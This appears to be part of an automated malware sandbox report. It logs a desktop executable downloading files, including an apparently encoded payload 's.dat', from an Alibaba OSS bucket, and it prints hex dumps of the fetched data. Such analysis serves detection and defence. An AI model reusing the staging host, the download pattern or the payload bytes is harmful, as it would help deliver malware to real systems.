                                                  2025-01-07 08:59:33 UTC547INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Tue, 07 Jan 2025 08:59:33 GMT
                                                  Content-Type: image/gif
                                                  Content-Length: 3892010
                                                  Connection: close
                                                  x-oss-request-id: 677CECF5B2582236355E2553
                                                  Accept-Ranges: bytes
                                                  ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                                  Last-Modified: Tue, 07 Jan 2025 03:43:57 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 3363616613234190325
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000104
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                                  x-oss-server-time: 21
                                                  2025-01-07 08:59:33 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                  Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                  2025-01-07 08:59:33 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                                  Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                                  2025-01-07 08:59:33 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                                  Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                                  2025-01-07 08:59:34 UTC4096INData Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95
                                                  Data Ascii: -J;wuwu{}uG`uWu{Q6
                                                  2025-01-07 08:59:34 UTC4096INData Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33
                                                  Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3
                                                  2025-01-07 08:59:34 UTC4096INData Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50
                                                  Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
                                                  2025-01-07 08:59:34 UTC4096INData Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79
                                                  Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                                                  2025-01-07 08:59:34 UTC4096INData Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4
                                                  Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                                                  2025-01-07 08:59:34 UTC4096INData Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7
                                                  Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
                                                  2025-01-07 08:59:34 UTC4096INData Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64
                                                  Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.54998239.103.20.934434028C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-07 08:59:42 UTC111OUTGET /s.dat HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: yuqi7x.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-07 08:59:42 UTC559INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Tue, 07 Jan 2025 08:59:42 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 28272
                                                  Connection: close
                                                  x-oss-request-id: 677CECFEF5B7DD36365623E9
                                                  Accept-Ranges: bytes
                                                  ETag: "DD7FE01656F6001B820833AF3F297C3F"
                                                  Last-Modified: Tue, 07 Jan 2025 03:43:52 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 6557897446247639200
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000113
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: 3X/gFlb2ABuCCDOvPyl8Pw==
                                                  x-oss-server-time: 8
                                                  2025-01-07 08:59:42 UTC3537INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                                                  Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
                                                  2025-01-07 08:59:42 UTC4096INData Raw: 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86 92
                                                  Data Ascii: ##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                                                  2025-01-07 08:59:42 UTC4096INData Raw: 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc 3c
                                                  Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH<
                                                  2025-01-07 08:59:42 UTC4096INData Raw: 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41 0b
                                                  Data Ascii: JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKSA
                                                  2025-01-07 08:59:42 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                                                  Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                                  2025-01-07 08:59:42 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                                  Data Ascii: ,$LDld=5}u]U
                                                  2025-01-07 08:59:42 UTC4096INData Raw: a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2 ed
                                                  Data Ascii: <EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                                  2025-01-07 08:59:42 UTC159INData Raw: 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 b8 ee 97 f7
                                                  Data Ascii: VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.54998339.103.20.934434028C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-07 08:59:43 UTC111OUTGET /s.jpg HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: yuqi7x.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-07 08:59:44 UTC544INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Tue, 07 Jan 2025 08:59:43 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 8299
                                                  Connection: close
                                                  x-oss-request-id: 677CECFFB258223634BB4953
                                                  Accept-Ranges: bytes
                                                  ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                                  Last-Modified: Tue, 07 Jan 2025 03:43:52 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 692387538176721524
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000104
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                                  x-oss-server-time: 10
